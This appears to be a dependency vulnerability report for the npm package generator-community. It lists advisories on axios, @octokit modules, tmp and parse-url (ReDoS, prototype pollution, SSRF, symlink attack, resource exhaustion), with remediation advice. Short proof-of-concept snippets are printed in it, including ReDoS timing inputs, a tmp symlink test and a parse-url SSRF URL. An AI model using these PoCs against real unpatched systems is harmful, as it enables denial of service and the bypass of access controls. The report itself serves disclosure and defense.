Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade axios to version 1.16.0 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: @octokit/plugin-paginate-rest
  • Introduced through: generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 github-username@6.0.0 @octokit/rest@18.12.0 @octokit/plugin-paginate-rest@2.21.3

Overview

@octokit/plugin-paginate-rest is an Octokit plugin to paginate REST API endpoint responses

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) through the octokit.paginate.iterator process. An attacker can cause significant performance degradation and potential service unresponsiveness by injecting a malicious Link header in the request.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade @octokit/plugin-paginate-rest to version 9.2.2, 11.4.1 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: @octokit/request
  • Introduced through: generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 github-username@6.0.0 @octokit/rest@18.12.0 @octokit/core@3.6.0 @octokit/request@5.6.3
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 github-username@6.0.0 @octokit/rest@18.12.0 @octokit/core@3.6.0 @octokit/graphql@4.8.0 @octokit/request@5.6.3

Overview

@octokit/request is a Send parameterized requests to GitHub's APIs with sensible defaults in browsers and Node

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) through the link header processing. An attacker can cause excessive CPU usage and potentially make the server unresponsive by sending a specially crafted link header designed to trigger inefficient regex backtracking.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade @octokit/request to version 8.4.1, 9.2.1 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: @octokit/request-error
  • Introduced through: generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 github-username@6.0.0 @octokit/rest@18.12.0 @octokit/core@3.6.0 @octokit/request-error@2.1.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 github-username@6.0.0 @octokit/rest@18.12.0 @octokit/core@3.6.0 @octokit/request@5.6.3 @octokit/request-error@2.1.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 github-username@6.0.0 @octokit/rest@18.12.0 @octokit/core@3.6.0 @octokit/graphql@4.8.0 @octokit/request@5.6.3 @octokit/request-error@2.1.0

Overview

@octokit/request-error is an Error class for Octokit request errors

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper handling of the authorization header. An attacker can cause excessive CPU usage and potentially freeze the server by sending a specially crafted authorization header containing a long sequence of spaces followed by a newline and "@".

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade @octokit/request-error to version 5.1.1, 6.1.7 or higher.

References

medium severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the data: URL handler. An attacker can trigger a denial of service by crafting a data: URL with an excessive payload, causing allocation of memory for content decoding before verifying content size limits.

Remediation

Upgrade axios to version 0.30.0, 1.12.0 or higher.

References

medium severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to the data.pipe(req) upload path in the HTTP adapter. An attacker can send a streamed request body larger than the configured maxBodyLength while maxRedirects is 0, causing the client to transmit the oversized payload to the server instead of stopping at the limit. This lets a remote peer force excessive bandwidth and request processing on applications that rely on maxBodyLength to cap upload size, potentially exhausting resources and disrupting service.

Remediation

Upgrade axios to version 0.31.1, 1.15.1 or higher.

References

medium severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through the HTTP response handling path in the http.js adapter. An attacker can force a client to accept and process a response body larger than maxContentLength by sending a streamed response with an oversized payload. This allows a remote server to bypass the configured response-size limit, causing the application to read and buffer more data than intended, potentially exhausting memory or stalling request processing.

Remediation

Upgrade axios to version 0.31.1, 1.15.1 or higher.

References

medium severity
new

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in the read function when attacker-controlled input is used as the cookie name parameter, which is interpolated into a regular expression without proper escaping. An attacker can cause excessive CPU consumption and freeze the browser tab by supplying specially crafted input that triggers catastrophic backtracking in the regex engine.

Note:

This is only exploitable if attacker-controlled data can reach the XSRF cookie name configuration or a direct/unsafe call to the internal cookie helper.

Workaround

This vulnerability can be mitigated by setting the XSRF cookie name configuration to null if XSRF protection is not required, avoiding the use of attacker-controlled input for the cookie name, and validating cookie names against a strict allowlist before passing them to the relevant function.

PoC

function vulnerableRead(name, cookie) {
  const start = Date.now();

  try {
    cookie.match(new RegExp('(?:^|; )' + name + '=([^;]*)'));
  } catch {}

  return Date.now() - start;
}

for (const n of [20, 22, 24, 26, 28]) {
  const cookie = 'x='.padEnd(n, 'a') + '!';
  console.log(`${n}: ${vulnerableRead('(.+)+$', cookie)}ms`);
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade axios to version 0.32.0, 1.16.0 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). An attacker can deplete system resources by providing a manipulated string as input to the format method, causing the regular expression to exhibit a time complexity of O(n^2). This makes the server to become unable to provide normal service due to the excessive cost and time wasted in processing vulnerable regular expressions.

PoC

const axios = require('axios');

console.time('t1');
axios.defaults.baseURL = '/'.repeat(10000) + 'a/';
axios.get('/a').then(()=>{}).catch(()=>{});
console.timeEnd('t1');

console.time('t2');
axios.defaults.baseURL = '/'.repeat(100000) + 'a/';
axios.get('/a').then(()=>{}).catch(()=>{});
console.timeEnd('t2');


/* stdout
t1: 60.826ms
t2: 5.826s
*/

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade axios to version 0.29.0, 1.6.3 or higher.

References

medium severity

Server-side Request Forgery (SSRF)

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) through the AxiosHeaders normalization path and shouldBypassProxy helper. An attacker can smuggle CRLF and other control characters into request header values by supplying crafted header input, causing injected header fields to be sent on outbound requests and potentially altering how downstream servers interpret the request; in proxy configurations, a request to localhost, 127.0.0.1, or ::1 can be routed differently depending on the no_proxy entry, allowing loopback traffic to bypass the intended proxy handling.

Remediation

Upgrade axios to version 0.31.1, 1.15.1 or higher.

References

medium severity

Symlink Attack

  • Vulnerable module: tmp
  • Introduced through: generator-license@5.1.0, generator-node@2.2.0 and others

Detailed paths

  • Introduced through: generator-community@commonality/generator-community generator-license@5.1.0 yeoman-generator@1.1.1 yeoman-environment@1.6.6 inquirer@1.2.3 external-editor@1.1.1 tmp@0.0.29
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 yeoman-generator@1.1.1 yeoman-environment@1.6.6 inquirer@1.2.3 external-editor@1.1.1 tmp@0.0.29
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 inquirer@7.3.3 external-editor@3.1.0 tmp@0.0.33
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 inquirer@7.3.3 external-editor@3.1.0 tmp@0.0.33
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 inquirer@7.3.3 external-editor@3.1.0 tmp@0.0.33
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 inquirer@7.3.3 external-editor@3.1.0 tmp@0.0.33
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 inquirer@7.3.3 external-editor@3.1.0 tmp@0.0.33

Overview

Affected versions of this package are vulnerable to Symlink Attack via the dir parameter. An attacker can cause files or directories to be written to arbitrary locations by supplying a crafted symbolic link that resolves outside the intended temporary directory.

PoC

const tmp = require('tmp');

const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);

try {
    tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
    console.log('test 1:', err.message)
}

try {
    tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
    console.log('test 2:', err.message)
}

try {
    const fs = require('node:fs');
    const resolved = fs.realpathSync('/tmp/evil-dir');
    tmp.fileSync({ 'dir': resolved});
} catch (err) {
    console.log('test 3:', err.message)
}

Remediation

Upgrade tmp to version 0.2.4 or higher.

References

medium severity

Server-side Request Forgery (SSRF)

  • Vulnerable module: parse-url
  • Introduced through: git-url-parse@7.0.1

Detailed paths

  • Introduced through: generator-community@commonality/generator-community git-url-parse@7.0.1 git-up@2.1.0 parse-url@3.0.2
    Remediation: Upgrade to git-url-parse@13.0.0.

Overview

parse-url is an An advanced url parser supporting git urls too.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to improper detection of protocol, resource, and pathname fields. Exploiting this vulnerability results in bypassing protocol verification.

PoC:

import parseUrl from "parse-url";
import fetch from 'node-fetch';
var parsed=parseUrl("http://nnnn@localhost:808:/?id=xss")
